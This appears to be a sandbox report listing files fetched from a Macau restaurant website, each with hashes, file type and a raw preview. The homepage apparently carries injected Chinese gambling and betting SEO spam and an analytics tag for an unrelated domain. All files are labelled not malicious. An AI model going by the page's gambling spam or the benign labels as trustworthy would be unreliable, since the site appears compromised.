                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1635
                                                                                                                                                              Entropy (8bit):5.2648936207094685
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:CqF2Z6JWVjUSVjmcdptrrc9kAPHLkFkTCu5J5:Cg2AWBHBDrw9HLkFkP5j
                                                                                                                                                              MD5:23D6B92BC7EB100FC1294E6B124B7E75
                                                                                                                                                              SHA1:F0649F9495D1F566A3F690002050B87800B4BCE2
                                                                                                                                                              SHA-256:D5B10953BA949844A4CE4501F3F2CB079DAA5F5EB8323B9580AEF1F7EAC899AA
                                                                                                                                                              SHA-512:6D3775DF960D79348E490BF827560E3F0DCBD0B2CE2A85C3B274E99AFF63F5B01F6580EDA6CA211C8524CF48D4FD210CBF743A8D00655ED1B7D8200E037AD668
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/favicon.ico
                                                                                                                                                              Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>....<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back<
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 14x11, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):575
                                                                                                                                                              Entropy (8bit):6.159447138537591
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:V/XPYhiPRd8+r+5/MadRomxIoZAcPU4zx6g+V3vk6:dkiPo+r+5/MsRSc1zx6gUb
                                                                                                                                                              MD5:81B616B6367ED5D205A22B6E278E1A22
                                                                                                                                                              SHA1:F29BE87F216C2073EAC77BFD7E61F8EB90AF877D
                                                                                                                                                              SHA-256:34DAB49B17E7148EE1DA651E0593E146375C024167DF8E69CD91DE56ABBFE91A
                                                                                                                                                              SHA-512:5CA441A9DAF504A6125D32B7C3EB7CE6979F8EC1CC20EB8EC2AF80CFC510124D439ECD91730883D2C3362CC944126EA01B2D1032DE322E0470257D49D83A52FE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/SysImages/first.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................y......................................................................!...Q2"B#3......................!..1Aq.Q..R..2b..............?...0]..7.S....+8EP:.........&..F.PB.A.0L...\..-.f....}z..1.!.....'..A.W.....PV|.._D...^...'0....17).4.4bSXx....5.L.9....|...Iw..-...u....55Ik.P.........5.R......./hD.V.n..A3...k.^..Q[..O|L.m.sH....R..c.!...............A...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 360x43, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):7862
                                                                                                                                                              Entropy (8bit):7.942124420352337
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Ex+W9WvObWK8G4nxqpavMNd2GD1RRrxrxeUyj:Ex+DtRAEvM3JRNxdyj
                                                                                                                                                              MD5:8C3D1BF93E52486F20B27A0B59D80A96
                                                                                                                                                              SHA1:A398248435F8161D6091D2CE9FBCE865A252CC75
                                                                                                                                                              SHA-256:0950F80B83135C315F35C64F8DDD86F37E15F59A606F0390D47CF7D9ED86E3CF
                                                                                                                                                              SHA-512:1DCED3B88C1442931A1700B537441F456E900F872BDB2362E9E6296968D040AC6BDD92F2ACEF89BD54600AE51C932D3E61CC16575CB2472B666E79FB30B1D055
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/logo.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................+.h............................................................................................!.1..AQq"2.a.....R.B.#.br..S.DT.U.......................!1..AQ..aq."..2B..R#......br...$............?..q.Z..)i.~g.C_...W.G..\>.H...w.*u..7..T;.~Q.?...I...|.%. .uS..s...)#...T...:y......|...I....5...#...s.?..~I...Ey's\...(...w...~I.....z..........?yQ......7......j..s..T.W..uo..OOt.?#.....MG...nM.\*[.3..Pn...^.5....7F...q...U5.......?.S..7..:.?Q.(.rk*.......Pj......>...>O..N...u......,u.r<J:......5.h.ZO.o3.....I...t.y.=i?....4G.'....Q.Q2.2....H......u .'......S.3....w.s...7...A..R.Wb.q^._R.....5../R.QJ..........:...>.z..y.E..:...........yMe*.%.v..{.......~Ju...W..T......\n.?..?$......o...m\n.....K...<a.o....W..~Q.?.uJYsj..Q.~...uq.....S.)u...].[.!..:.7.q.....|..Fv.ne..(
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 185x55, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7088
                                                                                                                                                              Entropy (8bit):7.912855776248855
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:kE/W1CKRVNzk0uccUGuzn1hapMF6lTQtc5oHJqY+SRfclnwwR0RXSxLF3mddRKSd:kTLvdcUGwtc5+szSxcBgXSxF2dfD
                                                                                                                                                              MD5:F807DD578BB1650146EE8DC00B85B89F
                                                                                                                                                              SHA1:FDA56FA6B9A2F5B35D930451A7E52617BA5F6A12
                                                                                                                                                              SHA-256:849AB671799FD3AE177FA0C8178AF792B744AC8DF6F9830FCFC711FABAFBD001
                                                                                                                                                              SHA-512:57C15610CC82FF8DF911F5481FBE18B8B80014BDB0FEADB9ACC2C14A0F91348C24F10F811D3918AA5F81BD0FE5A60D8D15906963351AAC9ECC3DA4E11C5E55E9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................7................................................................................................!.1a..AQ."..U.W..q.2B#...b....Rr....T.......................!..1AQ....aq"R.T....2.....Br..#3.$.sb..Sc.4............?.....}]...=.q.@...l...t.t7.q...x......q..-....JM....]..S.M..[Z.*.l.S..#Ww.p........g..J..9nn..?.w~3.I.'V.W...U.OG......ww..'4.[.w.p.j....|..W........v...mV.=............un..u......su^a.;..z..N..;.}.[..z..n..?.w~.RsI..y....~..W...y......Ni:.`.:...o....9..0.....=I.'V...\>..z=_.7U.....9......U.OG......ww..'4.[.w.p.j....|..W........v...mV.=............un..u......su^a.;..z..N..;.}.[..z..n..?.w~.RsI..y....~..W...y......Ni:.`.:...o....9..0.....=I.'V...\>..z=_.7U.....9......U.OG......ww..'4.[.w.p.j....|..W........v...mV.=............un..7:..6.qU...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=350, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=160], baseline, precision 8, 160x350, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):92859
                                                                                                                                                              Entropy (8bit):7.8625951181059595
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:2jowEjowPEms+qbVbHsPt7Kev7u3WSLQ1SqqUxyBOhlZLuCp4DbqzHRE:2gxwj0Ks7NSLQUqjyghvL/4D2jRE
                                                                                                                                                              MD5:38547BC6C74397CC593FDACA8C5790A5
                                                                                                                                                              SHA1:30333135FC0235EE4752031E8B746A87F01A767D
                                                                                                                                                              SHA-256:CB4F5104FF213DA882C58D211601DFB33C0D8A98395213A10BE6C45144566285
                                                                                                                                                              SHA-512:147116AC8D3FC53E1853737F967B91183F65398498D9113A88226E20A42687BA6A15389896A6950D006A433806E0CEF6605502C20121620034283026560E9F60
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/indexpic02.jpg
                                                                                                                                                              Preview:...."dExif..MM.*...........................^...........................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:05:28 11:33:51.............0221...................................^...............................n...........v.(.....................~.......... ........H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (478), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):478
                                                                                                                                                              Entropy (8bit):5.248053994066718
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:24pCOYsQNe+DMuDA/rP/0+pC51JNjhwU8CDRRxLhdH1MTQSkfn:24pXL8MuDA/gzXhwSRR1H1+QSkf
                                                                                                                                                              MD5:5DD27F8F2B042194C3CDABD62FD80110
                                                                                                                                                              SHA1:C035036A939799D4C29B9C0F7229AE1953D03109
                                                                                                                                                              SHA-256:928131AB2183D971CDBFE2ED1329200212D0021DB70574A35C89AE169C0F6E0A
                                                                                                                                                              SHA-512:95C7B2DBA57DD75E6120794C0FF14750258D8CA3C86E6EFCF04790D347BDA18E246E14D5FD8CE645E46E268F978132407BAFA93CA97FA003103B59C6135334BA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://s.ssl.qhres2.com/ssl/ab77b6ea7f3fbf79.js
                                                                                                                                                              Preview:(function(e){function t(e){var t=location.href,n=t.split("").reverse(),r=e.split(""),i=[];for(var s=0,o=16;s<o;s++)i.push(r[s]+(n[s]||""));return i.join("")}var n=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.so\.com)/gi,r=e.location.href;if(r&&!n.test(r)&&window.navigator.appName){var i="//s.360.cn/so/zz.gif",s=document.getElementById("sozz"),o=s.src.split("?")[1],u=t(o),a=new Image;r&&(i+="?url="+encodeURIComponent(r)),o&&(i+="&sid="+o),u&&(i+="&token="+u),o&&(a.src=i)}})(window);
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=129, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=970], baseline, precision 8, 610x43, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):24133
                                                                                                                                                              Entropy (8bit):7.048501390685723
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:qYNg7+cPiWYNg7/EnFxnKd9tFmpE8PmO0iXH/:qYyvPtYybEbRPV/
                                                                                                                                                              MD5:697AD2348C664C3B61CB6182B370E91A
                                                                                                                                                              SHA1:8262019BAC4D866DB52AC7F34DA1E0943C6FD87D
                                                                                                                                                              SHA-256:55E8FE87EC2ECC6B3719DB7EDA7281D9CBDFD5D31191FA3E5D29C65EE24B04FE
                                                                                                                                                              SHA-512:1DF928514306A5E2D900F9BDEB2C8E7E4C6EE673B3A3BF9C5D0BA0B69126AF0C96BFF65DB7FB780532CFB6FD6A97E40A6F0A0012FDBD5AA6981656B521DCBCE0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......Exif..MM.*.......................................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop CS6 (Windows).2020:06:30 13:25:11.............0221.......................b...........+...............................n...........v.(.....................~...................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 185x55, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):7351
                                                                                                                                                              Entropy (8bit):7.941270281650335
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:5YgYgYML24Wul8oRKbRp4d8eEmtHs0SVB2vDDvDDG:5jjl2kl8HPLhIHszVBu/2
                                                                                                                                                              MD5:1C365D663D4CA30154AD5F26052B1E6C
                                                                                                                                                              SHA1:06A09871C2F6DB3D080797ADC2BC395806AB713F
                                                                                                                                                              SHA-256:BFEBD21EAF0F7B7E7BF82C38F8C1C0C9CA877466BB5A03ADE67EDC60D9E08B53
                                                                                                                                                              SHA-512:C0BE7B24EC37E42807B7D467BBD9CE91620124D0BAC7284C50AFBEF65ACB0DB25A678A9FD16FBA426D5F3E05EE965AB1AF9C1FD1940046C4A57DF9042FE43ABE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/icon_photo.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................7...............................................................................................!..1.a."...U..W..AQq2..#.b...Br...$T.......................!..1AQ....aq"R.T....2...#..B.r3s.$...Sc.4............?...Qz.wj.2.e.......=..........xu.^..5UM[.0.m....ejRl_lv......m....!WSd.....w..8z........../......ww.?..un......~~............un..;!.......su^a.;..z..N..>'d>...z>.n..?.w~.RsI.....W.?.G...y......Ni:.`....j.....9..0.....=I.'V.....m^..=.G7U.....9....vC.........ww..'4.[.|N.}.{...}..W........v......~~............un..;!.......su^a.;..z..N..>'d>...z>.n..?.w~.RsI.....W.?.G...y......Ni:.`....j.....9..0.....=I.'V.....m^..=.G7U.....9....vC.........ww..'4.[.|N.}.{...}..W........v......~~............un..;!.......su^a.;..z..N..>'d>...z>.n..?.w~.RsI..X.vD.6I.]...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (621)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):29781
                                                                                                                                                              Entropy (8bit):5.431335024330434
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:f4I3qYG5gMdvusiPIx8SRwvuIXeWo03ov:fNG5gMdvusULvuIO03ov
                                                                                                                                                              MD5:43F123C8B57C567AC473E39D024BEB23
                                                                                                                                                              SHA1:E57D1B3B2B7567FA7C036F2892B42161CF93EBE6
                                                                                                                                                              SHA-256:ED13F1A49589A35493EB23C57ED536DEFC43E6208004DE8B21911F3A6C12F622
                                                                                                                                                              SHA-512:47E6432ED45546EDB848B8B9199B17841D6F5C9E7ACEBB8AB4A74D2D8E8A5811316AD68364F19CECE46F7EA143DCF80A593985D88781BEFBC06FBD2D5BBCACD4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:https://hm.baidu.com/hm.js?3eff88a357a8c5aca6bb583a65de2875
                                                                                                                                                              Preview:(function(){var h={},mt={},c={id:"3eff88a357a8c5aca6bb583a65de2875",dm:["ly66666.vip"],js:"tongji.baidu.com/hm-web/js/",etrk:[],cetrk:[],cptrk:[],icon:'',ctrk:[],vdur:1800000,age:31536000000,qiao:0,pt:0,spa:0,aet:'',hca:'C76EF187481BAB50',ab:'0',v:1};var s=void 0,t=!0,u=null,x=!1;mt.cookie={};mt.cookie.set=function(e,a,b){var k;b.C&&(k=new Date,k.setTime(k.getTime()+b.C));document.cookie=e+"="+a+(b.domain?"; domain="+b.domain:"")+(b.path?"; path="+b.path:"")+(k?"; expires="+k.toGMTString():"")+(b.dc?"; secure":"")};mt.cookie.get=function(e){return(e=RegExp("(^| )"+e+"=([^;]*)(;|$)").exec(document.cookie))?e[2]:u};.mt.cookie.rb=function(e,a){try{var b="Hm_ck_"+ +new Date;mt.cookie.set(b,"42",{domain:e,path:a,C:s});var k="42"===mt.cookie.get(b)?"1":"0";mt.cookie.set(b,"",{domain:e,path:a,C:-1});return k}catch(d){return"0"}};mt.event={};mt.event.c=function(e,a,b,k){e.addEventListener?e.addEventListener(a,b,k||x):e.attachEvent&&e.attachEvent("on"+a,function(d){b.call(e,d)})};.(function(){v
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2909), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):14526
                                                                                                                                                              Entropy (8bit):5.558588099535321
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:SIFKa9lKYiLeWN60/q/Wc1zqRHze46mxZQ2jECZPBKW4q7WlOKqCW2VAq/4hc:SIgFbQWwzqRS4F4CZ0LoWQPCAqN
                                                                                                                                                              MD5:A3E96AD8A53B476477338DB9AB70FF64
                                                                                                                                                              SHA1:45DFAE13061AF10483DDCC60039DA46DD4B0255A
                                                                                                                                                              SHA-256:F16E50139EE0969006C6DA9056BB2213B6376E0495202C5D1268BBF695204184
                                                                                                                                                              SHA-512:B1FA4BEEE1D9FE8E6ADEC699CCF15D3DC9C6EA672335500A93780791B5BF2E15C1ADDEC05032D04DADE5286756664AFD6CA683C147D56C40750D60742B39B920
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/
                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<meta name="applicable-device" content="pc" />.. <meta name="mobile-agent" content="format=xhtml;url=http://gourmethousemacau.com/m.html">.. <meta name="mobile-agent" content="format=html5;url=http://gourmethousemacau.com/m.html">.. <link rel="alternate" media="only screen and(max-width: 640px)" href="http://gourmethousemacau.com/m.html">..<title>&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;</title>..<meta name="keywords" content="&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#20080;&#29699;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#23448;&#32593;&#32;&#21170;&#29190;&#20307;&#32946;&#22312;&#32447;&#30452;&#25773;&#27880;&#20876;&#32;&#21170;&#29190;&#20307;&#32946;&#2
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 200x308, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):19266
                                                                                                                                                              Entropy (8bit):7.9613374796609415
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:UCjQidod0T/C8BROuQ7UmgDgixZ+JkK6Q908r/ixEqojqBlCjFeeKW:4id1nQYmBQ+GK60rxwCRLKW
                                                                                                                                                              MD5:6260F0C559FA4139416C4C065A67A852
                                                                                                                                                              SHA1:930CCEFF0B6D44714FF50747B3B09A7F81A19B96
                                                                                                                                                              SHA-256:2D649452452CA13E89CB6F2BBD930CFD91AFCBC298ED5F403E8478120F337856
                                                                                                                                                              SHA-512:1050BDFFCFA7C6B9358B572AA607776B35245F5EADB94BB563CA7027431C7849BDB83F3E4983989CAE754EC9216338928EB1AF65F1E87AF4DFA987CF66E70C03
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/pic_chocology.jpg
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................4.............................................................................................!.1A..Qa.q."....2..BR#....b3$.W.r57....4%.&'G......................!1...AQ.aq.."..2.T......BR#.3.bD.............?..>.>......n]........Y.....ne.SN.~S*K.......t.`..3.L.i.=P...+.=.Y+Wr.Z..J.s3.$.$..........G.W.C.|..U....$.~..fw......OW..=(y/...t./....o.~....OW..=(y/...t....V..q;..~....OW..=(y c...?..I._.f.....]...~H........wG.rwH......G.]...~H...C.|..U....$n.....G.]...~H...C.|..U....$n.....G.]...~H...C.|..U....$.....G.]...~H...C.|...wD..H.>..&....Q..o.=_.? ......N.........G.]...~H.........C.G.?.&..............%.....}...t.8..j?b......G./J.K.d.G....>..q7..~....OW..~.<..-]......?.M.5/..........%../.....r7O.......z.$~A.C.|...t......o.~....OW..=(y/......s[.....uKP.X.N!
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (306), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):11557
                                                                                                                                                              Entropy (8bit):5.444685457138446
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:3IcTV46IJZ6CYqICZvBsW4qdWlIKKbLrCmK9eJpWnMCNFks4WG1Gr:3IcGxYZCZqJ4WOB4eGfp4bGr
                                                                                                                                                              MD5:E60DE30BA277EF634466E35FAC27D475
                                                                                                                                                              SHA1:66045F30B027D1CCA2E85F4248FB703BA93582B4
                                                                                                                                                              SHA-256:C4FDD84D3CF4B4BA63AC8ECF1FAAB31B1EEDF1735345EE535661CCFF4C156740
                                                                                                                                                              SHA-512:82F720C980A59510EE9DABA89FC2F5E34061CD954A9AF4437A979F82868FE78ECADF98228C9FFB5869342AA26864D394FB561C22E749C97460584EE40C71343A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<title>Gourmet House Macau Ltd</title>..<link href="main.css" rel="stylesheet" type="text/css" />..<script type="text/JavaScript">.. ..function MM_swapImgRestore() { //v3.0.. var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;..}....function MM_preloadImages() { //v3.0.. var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();.. var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++).. if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}..}....function MM_findObj(n, d) { //v4.01.. var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {.. d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}.. if(!(x=d[n])&&d.all)
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 14x11, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):570
                                                                                                                                                              Entropy (8bit):6.205497876671049
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8vmMIj/lntEDltmEbc6hXmh6eg7zVo9EMbTezFqamOFrp:V/XPYhiPRd8+bjARnkgvVo9E0CIaGsWw
                                                                                                                                                              MD5:02D83B14468B986C6F01AE0D5BE2C4C5
                                                                                                                                                              SHA1:A04CADD5753BA0A00850A13CCA2AAD015721DFE1
                                                                                                                                                              SHA-256:2AAD93DD519944AD527FEE7BF72A7E86C5A95030EEA8579897B22D7565FB7CA5
                                                                                                                                                              SHA-512:B58DBCBA0E759E915D6154683D12912D1DE35B59CFA324CFC72CC7D21F257D41C846409B66D9AE5A770CD17790004B2CF13C1156AE8C5926EAC4FAB585A2CB8C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d.................................................................................................................................................................w.....................................................................!....Q"2B......................!...1Qq.A...2Rb..............?..[.P....C....9]...wErK.f.nmanN.).T.R....T. s..LL....s9..C....HD....o.Z....|.'....#?.#>.7N"..E..&8.`.HR99T.Jw..!...jd4..#.Mk.9......U...Z.On.8G.wc.L.=..b..r.M..5Oh.:\]8S,$..........Ng.......&....\c.[....~.B?.x2.w./.....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 72x28, components 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1321
                                                                                                                                                              Entropy (8bit):7.442886117980387
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPoj3G42t91XezpFKhoYerO7x4p+beyTi6EyDPk8R:Ki8YopCnsO7as+kL
                                                                                                                                                              MD5:857DA4AD548F1B3096B3243CE8B23E7B
                                                                                                                                                              SHA1:C183A4EDFBBDE6B85BE76E477C7FEB2A2E67BDD5
                                                                                                                                                              SHA-256:2B3E8D3DF07E9681065089DE0A6854A36D88DCAC3E13FF7543B39539287DAB0F
                                                                                                                                                              SHA-512:398857872C9EB6E6E9228DEBAD06DB29E22443544A6517F20E2A8AF6328EBE26A64E67FC461556F0A28173E209903E8330BD6DAA548A39A80FAEC9EE0DD8DE95
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......P......Adobe.d...................................................................................................................................................H.......................................................................................!A"..1aBQq2RS........................1.!A.Qa.....q....#.4............?..y...'=.9..DNz"s......D.-O'..u.....n*3..{-..2.Y....S.>HT1..~>w..L#.9...V.CAgrN.~..b.-...r7ow{.xF0.Uu.n..$%....L...m..P ..f.-...nL....e:.M.=v.M..d.....X..)K[>R.....S..N..x.y.j1......:.....*.1..}o..*......vUc...Kf...S.......^..`.mL....V.j.....I...w.Q,..)..(.U.nc...!.z..~...PG'..`.L.x.......A.F.q.5H.p."p.#....e.r.....J....-...d..@.......p.}4@M...v.tC.A.&>.n...8..9ebi..TZz.Z....!.0!..v...u...Yr......Ala...[|.b#!i...}3>_..n.w..>g..C.b..-.U..Mu....z....B>J$.s...,....m..iq......oP...?...;...Hq.-...w.M;uk.Z..E..6._..:.2.*B...Sx...W.v..........n.{D.'.MA=L.........Gspg..q.N......E.}.uS.y3.@.......1'31....U.Y...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 100x28, components 3
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1828
                                                                                                                                                              Entropy (8bit):7.642844311594331
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dkiPojb82sepluNBHYe14+zyjm60MOnwvOOWulTK7MJtfAQh4lecfTLrdd:Ki89urXueyn09n6hJtYQh+D
                                                                                                                                                              MD5:EB40F3116D57CE921F48F58B1AF2037E
                                                                                                                                                              SHA1:88CFDF893C93AC118E4298F399A5CE31EA3B0746
                                                                                                                                                              SHA-256:44528BFA51F37F2FA824A8438BCB7AD2B207320CE06516E69EB5684E35CF93DC
                                                                                                                                                              SHA-512:C7674B4FBB0DA3247AADF6C7B1E856470B327CDB46CEE3E04B8B531945E4D122BC944F77AFA1F7553D405000DE7EA4DB9F9A2524025AA7C18BB4EB6ED1D099DA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              URL:http://www.gourmethousemacau.com/images/menu03.jpg
